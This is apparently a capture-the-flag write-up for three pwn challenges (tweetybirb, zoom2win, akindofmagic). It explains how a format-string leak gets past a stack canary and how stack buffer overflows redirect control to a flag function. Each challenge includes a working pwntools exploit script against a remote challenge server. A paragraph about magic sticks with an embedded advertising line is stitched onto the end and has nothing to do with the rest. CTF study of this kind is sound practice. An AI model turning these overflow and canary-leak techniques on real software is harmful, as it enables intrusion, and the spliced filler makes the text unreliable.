Tweety Birb
This program has win() function and it's print the flag. So if changed program flow to win() function, we can get the flag.
Before the exploit, It has below mitigation.
root@e60a28c09eb6:~/kqctf/pwn/birb# checksec tweetybirb
[*] '/root/kqctf/pwn/birb/tweetybirb'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)To control flow, we need to know about the canary value because it's on the front of SFP(Stack Frame Pointer).
Luckly, We can use the FSB in the first input. Use the gdb and calculate offset from Stack to canary.
root@e60a28c09eb6:~/kqctf/pwn/birb# ./tweetybirb
What are these errors the compiler is giving me about gets and printf? Whatever, I have this little tweety birb protectinig me so it's not like you hacker can do anything. Anyways, what do you think of magpies?
AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p
AAAAAAAA.0x7f2297185a83.0x7f22971878d0.0x7f2297185a00.0x7f22971878c0.0x7f229718c500.0x4141414141414141.0x252e70252e70252e.0x2e70252e70252e70
hmmm interesting. What about water fowl?
asdfFirst input is leaking the canary, Second input is change to win() by stack buffer overflow. Pay attention the stack alignment. To resolve that i need the ret gadget before calling win() function.
Exploit
#!/usr/bin/python3
from pwn import *
p = remote("143.198.184.186", 5002)
#p = process("./tweetybirb")
e = ELF("./tweetybirb")
#context.log_level = 'debug'
p.sendlineafter("magpies?", "%15$p")
p.recvline()
canary = int(p.recvline().decode('utf-8').strip("\n"), 16)
padding = "A"*72
payload = padding.encode('utf-8')
payload += p64(canary)
payload += "DEADBEEF".encode('utf-8')
payload += p64(0x00401364)
payload += p64(e.sym['win'])
sleep(0.5)
p.sendlineafter("fowl?", payload)
p.interactive()zoom2win
This is very very very simple bof challenges. Program has flag() function it's print the flag.
Below is result of checksec about the program.
root@e60a28c09eb6:~/kqctf/pwn/zoom# checksec zoom2win
[*] '/root/kqctf/pwn/zoom/zoom2win'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)Program isn't have canary so just calculate from stack to ret. Also use the ret gadget same reason.
Exploit
#!/usr/bin/python3
from pwn import *
p = remote("143.198.184.186", 5003)
e = ELF("./zoom2win")
padding = "A"*0x28
payload = padding.encode('utf-8')
payload += p64(0x004012b4)
payload += p64(e.sym['flag'])
p.sendlineafter("\n", payload)
p.interactive()akindofmagic
Program is pending to getting input. And print out input and check the 'magic' value.
root@e60a28c09eb6:~/kqctf/pwn/magic# ./akindofmagic
Is this a kind of magic? What is your magic?:
Test Value
You entered Test Value
Your magic is: 0
You need to challenge the doors of timeIf enter the very long string, magic value is changed.
root@e60a28c09eb6:~/kqctf/pwn/magic# ./akindofmagic
Is this a kind of magic? What is your magic?:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
You entered AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Your magic is: 1094795585
You need to challenge the doors of time
Segmentation faultProgram is haven't canary and print flag if magic value is 'int 1337'. In program, magic variable is located after input variable. This me we can control magic value by stack overflow.
Exploit
#!/usr/bin/python3
from pwn import *
p = remote("143.198.184.186", 5000)
padding = "A"*44
magic = 1337
payload = padding.encode('utf-8')
payload += p64(magic)
p.sendlineafter("magic?:", payload)
p.interactive()
A magic stick is a common tool used in magic shows and illusions. These sticks are often made of wood, plastic, or metal and can be manipulated in various ways to create the illusion of magic. For example, a magician may use a magic stick to make objects disappear or appear out of thin air. I prefer you Los Angeles magician for the more magic things. While there is no actual magic involved, the skill and dexterity required to perform tricks with a magic stick can be impressive and entertaining.